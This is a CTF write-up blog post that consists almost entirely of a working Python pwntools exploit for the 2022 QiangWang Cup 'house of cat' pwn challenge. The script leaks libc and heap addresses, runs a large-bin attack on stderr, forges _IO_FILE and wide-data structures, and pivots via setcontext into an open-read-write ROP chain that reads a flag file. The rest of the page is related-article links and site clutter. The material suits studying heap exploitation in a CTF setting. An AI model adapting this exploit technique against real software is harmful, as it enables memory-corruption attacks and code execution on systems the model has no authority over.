2022强网杯house of cat

最新推荐文章于 2024-10-30 13:16:11 发布
最新推荐文章于 2024-10-30 13:16:11 发布
阅读量353 收藏
点赞数 7
文章标签: python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63437215/article/details/127965986
版权

exp

from pwn import *
context.log_level='debug'
context.arch='amd64'
r=process('./cat')
elf=ELF('./cat')
libc=elf.libc

r.sendafter('mew mew mew~~~~~~','LOGIN | r00t QWB QWXFadmin')

def info(a,b):
    log.info("\033[0;33;40m"+a+hex(b)+'\033[0m')

def add(idx,size,cont):
    r.sendafter('mew mew mew~~~~~~', 'CAT | r00t QWB QWXF$\xff')
    r.sendlineafter('plz input your cat choice:\n','1')
    r.sendlineafter('plz input your cat idx:\n',str(idx))
    r.sendlineafter('plz input your cat size:\n',str(size))
    r.sendafter('plz input your content:\n',cont)

def delete(idx):
    r.sendafter('mew mew mew~~~~~~', 'CAT | r00t QWB QWXF$\xff')
    r.sendlineafter('plz input your cat choice:\n', '2')
    r.sendlineafter('plz input your cat idx:\n',str(idx))

def show(idx):
    r.sendafter('mew mew mew~~~~~~', 'CAT | r00t QWB QWXF$\xff')
    r.sendlineafter('plz input your cat choice:\n', '3')
    r.sendlineafter('plz input your cat idx:\n',str(idx))

def edit(idx,cont):
    r.sendafter('mew mew mew~~~~~~', 'CAT | r00t QWB QWXF$\xff')
    r.sendlineafter('plz input your cat choice:\n', '4')
    r.sendlineafter('plz input your cat idx:\n',str(idx))
    r.sendafter('plz input your content:\n', cont)

add(0,0x420,'aaa')
add(1,0x430,'bbb')
add(2,0x418,'ccc')#use
delete(0)
add(3,0x440,'ddd')
show(0)
leak_libc=u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
info("leak_libc-->",leak_libc)
libc_base=leak_libc-0x21a0d0
info("libc_base-->",libc_base)
r.recv(10)
leak_heap=u64(r.recv(6).ljust(8,b'\x00'))
info("leak_heap-->",leak_heap)
heap_base=leak_heap-0x290
info("heap_base-->",heap_base)

_IO_lock=heap_base+0x200
pop_rdi=libc_base+0x000000000002a3e5
pop_rsi=libc_base+0x000000000002be51
pop_rdx_r12=libc_base+0x000000000011f497
ret=libc_base+0x0000000000029cd6
pop_rax=libc_base+0x0000000000045eb0
stderr=libc_base+libc.sym['stderr']
setcontext=libc_base+libc.sym['setcontext']
close=libc_base+libc.sym['close']
read=libc_base+libc.sym['read']
write=libc_base+libc.sym['write']
syscall_ret=libc_base+0x00000000000EC0B9
_IO_wfile_jumps=libc_base+0x2160d0
flag_addr=heap_base+0x17d0

data = {
    0x0:{
        0x30:[
            1,
            2,
            heap_base+0xbb0,
            setcontext+61
        ],
        0x58:0,
        0x78:heap_base+0x200,
        0x90:heap_base+0xb30,
        0xb0:1,
        0xc8:_IO_wfile_jumps,
        0xd0:{
            0x30:heap_base+0xb40,
            0x70:heap_base+0x2050,
            0x78:ret
        }
    }
}

delete(2)
add(4,0x418,flat(data))
delete(4)
edit(0,p64(libc_base+0x21a0d0)*2+p64(heap_base+0x290)+p64(stderr-0x20))
add(5,0x440,'aaa')
add(6,0x430,'./flag\x00\x00')
add(7,0x430,'eee')

orw=p64(pop_rdi)+p64(0)+p64(close)
orw+=p64(pop_rdi)+p64(flag_addr)+p64(pop_rsi)+p64(0)+p64(pop_rax)+p64(2)+p64(syscall_ret)
orw+=p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(flag_addr)+p64(pop_rdx_r12)+p64(0x50)+p64(0)+p64(read)
orw+=p64(pop_rdi)+p64(1)+p64(write)

add(8,0x430,orw)
delete(5)
add(9,0x450,'aaa')
delete(7)
edit(5,p64(libc_base+0x21a0e0)*2+p64(heap_base+0x1370)+p64(heap_base+0x28e0-0x20+0x3))
r.sendafter('mew mew mew~~~~~~', 'CAT | r00t QWB QWXF$\xff')
r.sendlineafter('plz input your cat choice:\n','1')
r.sendlineafter('plz input your cat idx:',str(11))
gdb.attach(r)
r.sendlineafter('plz input your cat size:',str(0x450))
r.interactive()

动态调试

 

 

 

 

 

 

 

 

KingKi1L3r
关注
第六届“强网杯”全国网络安全挑战赛
Pysnow's Blog
08-06 1936
也就是go服务端,接着go再解析json,并计算出cost,如果cost小于money就成功,并将money返回,flask这边接受到数据并上传到数据库上。,令num为0就不用花钱了,要在双键的前面被覆盖位置。
强网杯-2022-GameMaster(.NET+C#+提取文件+z3爆破)
qq_54894802的博客
06-18 366
分析下面的代码,可以知道,这部分实现的代码,就是根据我们的按键,施行对应的操作,其中Enter键和space键,对应的函数下都有deal和stand,hit键,如果简单的玩过一下这个游戏,我们很容易知道,这几个函数实现的功能就是进行输赢的判断和检测自己的金钱还有多少,游戏是否继续。我们可以找到一个MZ的头,我们将其前面的数据删除,然后将其加入dll的后缀,因为此文件是以dll文件的形式载入我们的程序的。这里我们可以发现,是读取了我们的附件所给的gamemesage里面的数据,读取到filestream,
[2022 强网杯] house_of_cat 战战兢兢的复现
weixin_52640415的博客
08-04 403
libc-2.35 UAF 通过stderr虚表 执行ROP
[强网杯2023] 只作了几个小题
weixin_52640415的博客
12-17 2511
格式化字符串 %nc%*d$d%k$n
house of cat
tbsqigongzi的博客
09-01 620
2022强网杯 House of cat
强网杯2022 pwn 赛题解析.docx
12-18
强网杯2022 Pwn赛题解析】 在网络安全竞赛“强网杯”中,Pwn类赛题往往考验参赛者对内存安全漏洞利用的理解和技术应用。本题涉及的是一道基于高版本glibc的House of Apple攻击,这是一种利用大型bin(large bin)...
house of banana .pdf
09-05
House of Banana:深入理解安全实践与堆利用技术》 在信息安全领域,攻击者不断寻找新的漏洞和利用手段,以突破系统防御。"House of Banana"是一种针对glibc库的新型堆利用技术,自glibc 2.28版本以来,由于其...
2.27 house of botcake例题附件
05-31
2.27 house of botcake例题附件
专题资料(2021-2022年)house特许经营合同.doc
10-07
专题资料
House of apple 一种新的glibc中IO攻击方法.doc
07-09
House of Apple - 一种新的 glibc 中 IO 攻击方法 本文提出了一种新的 glibc 中 IO 攻击方法,名为 House of Apple,该方法可以在高版本 glibc 中成功实施 IO 攻击。该方法基于对 IO_FILE 结构体的伪造和 IO 流的...
house of cat 学习
m0_51251108的博客
10-13 1284
house of cat的利用链学习
强网杯2022 pwn 赛题解析——house_of_cat
CoLin的pwn小屋
08-04 3183
强网杯2022 pwn 赛题分析——house_of_cat
深入理解 House of Cat
红叶的博客
05-16 979
exit() --> __run_exit_handlers --> _IO_cleanup --> _IO_flush_all_lockp --> _IO_wfile_seekoff --> _IO_switch_to_wget_mode --> _IO_switch_to_wget_mode 的 call rax。当RCX为0时,程序进入了这段 if 语句。_wide_data 指向的 _IO_FILE 结构体的 _IO_write_ptr 必须大于 _IO_write_base,mode 大于0。
2022强网杯pwn部分wp
N1rvana的博客
08-02 1582
2022强网杯pwn
house系1
njh18790816639的博客
08-09 360
参考:https://bbs.pediy.com/thread-273895.htm#msg_header_h1_0(提出了这种新的方式) 该文章虽然提出了新的手法,但是有些地方省略过多,故进行了调试分析,总结出完整的一个流程,分享给大家: 位于==/malloc/malloc.c之中可以发现__malloc_assert的定义,并且__assert_fail等同于__malloc_assert==,而==__assert宏定义调用了__assert_fail==: 可以发现首先执行==__fxprintf
python】极简教程14-文件
每日出拳老爷子的博客
10-28 247
可以使用相对路径或绝对路径来访问文件。模式可以将内容写入文件,如果文件不存在会自动创建。捕获文件读取或写入时可能出现的异常。循环逐行读取文件,或者使用。模块可以帮助处理文件路径。函数打开文件,并通过。
196.245.124.255.236.194.0.0.0.0.0.0.0.0.9 用python截取最后一个点后面的数据
最新发布
qq_44534541的博客
10-30 129
这个方法从字符串的右边开始分割,并且可以指定分割的最大次数。在Python中,如果你想要截取字符串中最后一个点(,因为它是最后一个点后面的数据。这段代码会处理没有点的情况()和点的后面不是数字的情况()后面的数据,你可以使用。
植物病害图像分割系统:智能化检测
prchen818的博客
10-30 943
数据集信息展示在现代农业生产中,植物病害的早期识别与处理至关重要。为了提升植物病害的自动检测与分割能力,本研究选用了名为“new_plant_diseases”的数据集,旨在训练和改进YOLOv8-seg模型,以实现高效、准确的植物病害图像分割。
安装python时Install launcher for all users灰色无法选中解决方法
夏末蝉未鸣的博客
10-30 199
解决办法:可能是上一次卸载python没卸载干净,在控制面板中卸载,把Python Launcher卸载掉。卸载完后,就可以正常安装了。
2022强网杯pwn赛题详解:基于largebinattack的houseofapple漏洞利用
强网杯2022年的Pwn赛题解析主要聚焦于一道难度较高的题目"house_of_cat",该题挑战者需利用glibc 2.35版本中的漏洞进行攻击,这是当时Ubuntu 22.04系统上最新版glibc。题目吸引了众多参赛队伍,但因涉及高级的_...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值